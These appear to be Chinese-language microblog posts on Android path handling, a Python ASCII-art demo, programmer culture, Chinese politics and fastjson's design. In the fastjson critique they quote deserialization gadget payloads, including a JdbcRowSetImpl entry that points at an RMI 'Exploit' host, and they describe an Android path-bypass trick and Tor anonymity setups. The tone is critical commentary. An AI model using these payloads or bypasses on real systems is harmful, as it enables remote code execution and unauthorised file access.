#android #linux #security 幽默 utf8_casefold 大小写合并算法冲突 🤣 unicode迫真一致化
所以还是用 bytes 算了吧，大小写整什么花活， 幼稚程度堪比log4j或者在shellUI加广告的win10
FUSE 和 kernel GKI 的实现不一样，导致 /Android /.. 既不在访问黑名单里，syscall也解析到原地址

> 从此，指向存储空间的路径，例如 /storage/emulated/0/Android/data，由于 emulated 是 fuse，其底层是 /data/media，所以从 0 开始 (包括)，可以在任意位置插入默认可忽略代码点，内核自动删除它们。

如果用户空间在比较路径时没有执行与内核相同的步骤，会引入安全问题，导致本应拒绝访问的路径被绕过。需要重点检查FileProvider逻辑，如果它对外提供对共享存储空间文件的访问权限，私有存储不受影响。

#china #经济 萧条&娱乐至死
https://www.fxzhihu.com/question/509734553/answer/3318740317

#os #rust https://zhuanlan.fxzhihu.com/p/3970519832
有栈协程

#ai #game https://doiiars.com/article/angry-pumpkins
600行自动生成单关卡 怒鸟

https://www.fxzhihu.com/question/4598614819/answer/37786364436 #bilibili 炒冷饭

我语文能力不好， 这个答主说的在理， TM 两行代码的东西，矩形片map成单字符像素的，Linux 小白都会玩(cowsay-alike)，你抄抄抄……
我教 #py 都不敢写这么简单的例子，这垃圾功能也懒得用C凑字数
😅最崩不住的是，这撕还摁造了个高材理工男人设，git clone 都不会，MIT都不懂，贡献代码？也是奇葩

#code heart ASCII ❤️

import os, cv2, time
from numpy import*

Nm=array; mix=interp
sh=lambda s: os.popen(s).read()[:-1]

def heart(P, k=.8):
  t = mix(mod(iTime, k), [0, k], [0.3, k])  # Heartbeat
  r = (P[1] - power(abs(P[0]), t))**2 + P[0]**2 - 1.0  # Grayscale function
  return where(r < 0.3, mix(-r, [0, 0.3], [1, 4]), r)

grays = Nm([*" .-:", '\x1B[1;31m=\x1B[0m', *"+*%@#"])
GL=lambda w,h: Nm(meshgrid(linspace(0,1, w), linspace(1,0, h)))

def drawBW(g, wh=flip(int32(sh('stty size').split())), bg=grays):
  a=(1-g(GL(*wh)*5-2-sin(iTime)))*256 if callable(g) else cv2.cvtColor(cv2.resize(g, wh) , cv2.COLOR_BGR2GRAY)
  b=int8(mix(a, (0,256), (0,len(bg)-1) ))
  print('\x1B[0;0H', '\n'.join(''.join(y) for y in bg[b] ))

try: #.: ipy -i
  @get_ipython().pt_app.key_bindings.add('c-k')
  def cropBW(F5):
    g=cv2.imread(sh('zenity --file-selection'))
    drawBW(g)
except:
  for iTime in (x/100 for x in range(0, 600)): drawBW(heart); time.sleep(1/60)

https://asciinema.org/a/95472 ANSI粒子
https://zhangshuqiao.org/2018-05/有趣的Linux命令行工具/ 有天气预报
#tool curl -4 http://wttr.in

纯sdf, 顺手移植了一个给 numpy+tty

花了1小时吧：
cv2.open(mode=HSL亮L).降采样为(stty size) mix(256色到" .*#"色) .追加\n列 .光标到(0,0)print

我用了比yes命令内存效能低的join''，但也不打紧

#performance fwrite() 就像CtrlV，要打'y'*500你是粘贴五百次还是多复制、缓冲？
把rows('<U1').buf分隔复制到 int8(w*h+1h)，按帧yield给/dev/pts/0管道更省
若一开始就 open(w+1'\n',h) 就是SIMD汇编一样快了，当然，0copy 不如 diff update ，之前逐px试过确实。

有时看 #bilibili 编程圈，感觉是「时无英雄竖子成名」，比如那个开「知识」星球赚百w的鱼皮
像🐴一龙那样因追求，最终有钱的少，更多技术人有比钱更高的需求。
在老中这很搞笑很虚伪吧？ #statement

不过我是很清楚，B站上真大佬有 #algorithm #OI 的一大堆， @从0开始数 就是，
其实是学生们只喜欢看抽象的「编程娱乐直播」 JavaWeb PHP 什么的曾经很赚钱的 🥰 甚至不一定要有代码，可敬抄嘛，
那个微信首屏卡成 🐴，音视频通话按钮都混乱，拿AI做避讳和偷窥这样的脏事， 还一堆人 pixel perfect 地致敬张小龙，其实就是这种大厂功利心态，
何同学呢？ 作为主=5G的第二个受益者 ，其实不配说热爱 奋斗 赛博丁真

https://www.fxzhihu.com/question/4598614819/answer/37682686698 【代码姜萍】：我超似你的 🦄

丁真是理塘的骄傲，何同学是北邮的耻辱。
#CS 校友都能均衡学习 https://www.chenxutalk.top/posts/bugs/bupt-courses/#编译原理与技术
代码姜萍却连拖库都要外包

https://www.bilibili.com/video/BV1zG4y1f7c7 🤔.. 码农搞天
这个人比较有素质，锐评了丁真对MIT自作聪明。 但对于清华毕业，微软员工，Python核心开发者， 还有点信息差……
其实这个CG挺无聊的，也就对前端后端稀奇， offscreencanvas.com 那种才是标准

在找些 3D demo 时，发现他是我4年前的水平.. 那时候总觉得自己比编译器比lib聪明，不重视简洁明确，也罢。 最近有「清华拳」南开辅导员，也是IT男。
不过他挺有意思的 😅 没有真去算particles或noise，而是用mp4的PIL(cv2) 粘贴旧帧，还用了js canvas.. 也是比何同学 ASCII art 用的技术牛逼点，我搞过
https://t.me/dsuse/18702

200行代码交给iq能做到 shadertoy.com/view/4lK3Rc
>在一场C语言开卷考试中，和自己的清华大学男友通过腾讯文档共享来作弊，被一位临时担任监考老师的大四辅导员发现。
好像，也就是美帝资助的学堂罢了。

#design 3d #cg #dalao https://alain.xyz/blog/switching-between-js-cpp-rust
https://marmoset.co/toolbag/viewer/

#china 最近献忠禁报了☺️舒心~
唉，学宣传学的 https://m.youtube.com/watch?v=Zh6FpWdxVM4
https://m.youtube.com/watch?v=DsNkGduKqzU Louise 整理了法制的失序

#hk 未来有拿身份证的风险， 言论和劳权自由 有被共走的取向

未来的意识形态，是左，是民粹（对内对外 不平等），还是自由法制？

信🐱信希特勒的人不少。 我们在西方看来确实是恐怖主义地区了， 赞助鹅爹，联盟CRINK，献祭小学生，开车歼35

#china #news 潮汕，吃财政饭吃的

不拿一针一线，不休一朝一夕，
罚光一粥一饭，尽蛀一司一户🐻

“鬼子”来了， 讨薪者才能人人平等嘛
易姓改号，谓之亡国，人之相食，谓亡天下。
人是以是非判断定立场的，狗是以主人的立场判断是非的，其命运截然不同。

#china #dev #经济 http://www.bilibili.com/video/BV1dfBHY4EHg

>
现在应该老实了，一大堆人在谴责为什么要抽向弱者
按照社达的理论，干不过汽车大棒刀子的不是活该被淘汰？ 🤗

开车过来社达就老实了？筛选出跑得比车还快的人类出来，还得比汽车硬 😡
按照社达的逻辑，人最多活35……婴儿期就度不过。动物世界可是喜欢吃老的和小的
——我教教你怎么爱国。“谁不招35岁以上员工，我们就抵制谁。不买他的产品、不看他的广告、不接他的代言，直到把他抵制到愿意招为止”。
>
我才不怕战争，一听到战争我就兴奋。战争的代价嘛，无非是死亡。咱就是一个普通老百姓，命不值钱。
如果没有战争，一辈子也就那样了，不会有大出息。上战场运气好立个战功，下来后混个官当当就知足了。
早打，大打，打核战争

https://www.youtube.com/watch?v=hoimKGznIwE 🤔💭 #people

蔡霞 做了两期VOA了，《穹顶之下》柴静 最近有没有更新？

https://blog.lxscloud.top/2022/12/29/记一次请求伪混淆实验/ #net #freedom
https://www.zhihu.com/question/653647449 🙉大记忆恢复术！
>想抓的话一抓一个准

真是有点佩服贱忠圈互联网对自由世界隐私意识的意淫能力。 都2024了什么技术没有，靠偷开源，就精神胜利是吧？不够本。 有能耐把爱因斯坦和胡适抓回来批斗 😊

红小将恨民党能找到阮老师，是因为他揭露权贵/腐败前就在豆瓣。搜索引擎上都公开有，搜同图搜同书名就知道，即便这样，这帮法西斯饭桶还是找了10年。 阮只是装作重视匿名性，如同反贼声称自己在国外(yt上有不少北上广)，红小将就被带歪了方向，那如果是真的呢？ 和忠教品牌华为的芯片一样可悲。
而恐吓爆炸的韩裔学生，在哈佛网络ISP上直连Tor+10min mail ，这种特征都不会藏，学个毛的心理学。

>国内一般是蜜罐代理给VPN当前置，最后一步再接Tor， tor over rdp.. 现在大把Tr的sni还是用 update.windows.com 伪装成 windows 升级的流量
>接入Tor的是自己的海外服务器，而接入网络的方式是餐馆咖啡店的匿名wifi。

这些讽刺日本能信用卡诈骗的贼始终不知道，警察社会才是运行不下去的。 以前地铁在那表演安检，现在国内频繁歼35还不知情，无新闻，如同鲁迅所言的那个黑屋子， 啧啧

#sql #history https://www.fxzhihu.com/question/419913304/answer/3416608114
https://www.zhihu.com/question/35745351/answer/334610655 pwsh vs zsh , #os 设计

https://github.com/tuteng/Best-websites-a-programmer-should-visit-zh?tab=readme-ov-file#针对那些想开始一个小的项目但是无从下手的人
#tool awesome list

#dev #learn 公案 zen 入门 https://github.com/ts25504/awesome-koans#:~:text=编程语言的学习也有一种公案形式的学习方法，是我见过的最好的学习一门新的编程语言的方式
重构浣熊 🐿收录的10种流行 #OOP Design Pattern 掩盖了哪些语言特性的缺失 ？
https://refactoring.guru/refactoring/when
https://www.ruanyifeng.com/blog/2017/02/fp-tutorial.html
#web #design 推荐 https://component-party.dev/
https://github.com/RimoChan/match-you/blob/slave/mother.kt :偷偷发给同事启动，他电脑上装好的依赖就会被删掉，然后他就得自己配环境了！..

https://t.me/hyi0618/5036?comment=6393
#algorithm #visualize

>poetry pip 用 #Rust rewrite #statement
这种类似 docker/chroot 的东西其实C API调用都很少，最复杂的部分反而可能是 CLI getopt 和配置文件模板，根本不需要rust..

rust 的意义就是让我们觉得很Niubility，很neo，但写出来的东西，其实不比拿zsh或py胶水几个包快。 printf "\e[33m黄字" 这样的功能强吗？ ruby也能做啊，写那么麻烦没意义，其实就是上情绪价值。

像 Vue 最近那个 oxc ESTree 用Rust才有点意义，因为它背后有一个更简洁通用的数据模型，类似与 tree-sitter vs ANTLR/PEGgyjs.org ，这才是革命性的

#life 移民 https://www.fxzhihu.com/question/570129737/answer/3379499929

>他在海关被留在问询室（俗称小黑屋）48小时，出来被带到难民安置中心，六个月后放出来得到一张绿条儿（临时工卡），然后就可以合法打工啦。

华人修脚店打工，从见习修脚技师，到修脚技师，到高级修脚技师。过了没几年就有绿卡了，比H1B排期快多了，不知道快多少倍。
我当时看着手里的J1签证陷入了深深的思考，觉得自己活该loser。
胡建免签全球，真不是吹的
>你都不用撕护照，直接六个月C8(BH)卡，无非就是身份过期之前申请，c8工卡很快就下来了。
>求求你们快来吧，现在送外卖和开网约车的越来越贵了，再不来点华人卷真就吃不起外卖了。

#china #sql #java #security #recommend
省流: fastjson 作者实现了前端都不能的 JSON.parse('{"__proto__":{"name":"FakeClass"}}') instanceof RealClass
它比JSer在类型检查上更 👈🤡

fastjson 窝槽， Ali 的架构师设计也真是逆天啊！！ 2020的分析，今天才看到，狗屎程度堪比 antd 事件
Jackson 真是多亏同行衬托 😅 温高铁​还煞有介事在下面装无辜， 晒自己咋优化 Latin-1(8bit)+UTF8 转wchar(16b) 比赢JDK

# xx toJSONString : {"sale":{"price":0.5},"name":"Hollis"} 的类结构
.:
  - Store-name-sale ["" IFruit]

.: IFruit
  - Apple-price [0]
  - Free

-xx Store "Hollis" (Apple 0.5)

这里有个问题， IFruit 其实是 sealed interface IfFruit{ Apple; Free } ，前者有"price":Int 后者没有field或setter，因此 parse<Store> ("{..}").sale as Apple 只能失败。

那 IFruit 凭啥能在无 backing field 的情况下被databind出来？new java.lang.reflect.Proxy ……😂 var by mapOf(); 没错，他搞笑呢，从性能和structure对应性上这都是fatal
那咋实现 OOP=封装+多态继承 呢？ 通过严格定义的 sealed/enum ADT{} ？通过XML？都不是，他懂， Auto "@type"...

{
    "@type":"com.hollis.lab.fastjson.test.Store",
    "fruit":{
        "@type":"com.hollis.lab.fastjson.test.Apple",
        "price":0.5
    },
    "name":"Hollis"
}
// 正确做法
{"sale":{type: Apple, "price":0.5},"name":"Hollis"}
// Rust默认做法
name=Hollis
[sale]
Apple={price=0.5}

脚本引擎都弄出来了呀…… 这画风和js的JSON迥异，生硬如同 new WTF({kwarg:..})
于是计算器就出来了 {@type:com.sun.rowset.JdbcRowSetImpl, dataSourceName: "rmi://localhost:1099/Exploit"} ，数不清的注入点。
{"@type": "jdk.jfr.internal.JVM", "memorySize": 1} , {@type":"com.ibatis.sqlmap.engine.transaction.jta ... 变游乐场了

第一次知道这么脑洞打开的 workaround ，是把 List<*> =Any 泛型擦除当真理了吗， 真当子类多态就是一切皆Object 一切有@type呢， 其实那就是 enum { A(int) B(str) } 的特例而已！👈🤣
最搞的是JDK和这家伙一样喜欢玩魔法，开 1.2.25 blacklist 后 lazy(loadClass)("[Lcom.sun.rowset.JdbcRowSetImpl;") 等为方便ASM和反射也是合法类名，和温大佬异想天开的不一样， 修得和安卓 utf8_casefold 大小写合并bypass 一样弱智。真是不能期待他们在RCE 0day后，对OOP和json的强类型理解会有所反思，
因为直到 1.2.47 ，他都用类似 breakwa11 的黑名单「闭源」来防，拉黑算法还有bug…… 恕我直言，common sense 缺到有点好笑。 还@type呢， {"": "Apple"} 都是合法json，这不得快得废弃来？
(子类多态，var_a:T=b as T1 合法， Fn1<in T,out R> 就可以兼容赋值?super T ，override同理，这才叫懂八股..)

和log4j一样级别的。有时候我都好奇，在一个a[i]的 i±1 都绝对报错的代码世界，在try{return} 都会跳到finally{close..}的事务性严谨圈子里，在 sudo kill -9 随意但弱密码和Thread.stop不允许的稳健文化下，SQLi这种让WAF替你修的语意性混淆咋被容忍的。 弄得好像骇客们RCE进封闭系统如探囊取物，硬件主权全无效似的。
——
compile('select {}+1') (232) 是怎么能和 eval(f'{232}+1') 混为一谈的，代码和常量就这么拼接了？一个扁平一个嵌套分不清吗？ 我 模仿JS元编程20行 INI.dumps() 都未曾设想的逆天类型观 ，这就像幻想「富文本」里会有 <script>、fetch() 会带站内cookie执行任意 curl 能做的事，真拿人html/DOM就瞎用，丢的岂止隐私？

唉，草台班子。 「你就说弹calc.exe快不快吧」
这不禁让我想到「一种游戏服务器RPC返回Object的方法」： 直接把0xcafababe..的对象指针传客户端。 😓你怎么验证那句柄是否有效，能够安全写入？ set<usize> 还不如 map<int,usize> 快
如果客户端瞎JB暴力指向了admin密码上，或ROP覆盖了return“回调”的函数呢，你是否还记得 x=malloc(N) free(x) 为啥要对「整数x」严格限界、正确配对？

libc 和 Linux 防但防不住的，就是这种撒手掌柜啊 🤡
真是群爱等编译的脚本小子。 Talks

我突然觉得，如果 #IT 界都是温高铁这种拿粗鲁当聪明的「小天才」， Rust 还挺可爱的。

至少它不会放那些 x=(void*)(int*)n 的人进 unsafe{} ，也不会把 println!("%s%s") 的检查放进运行期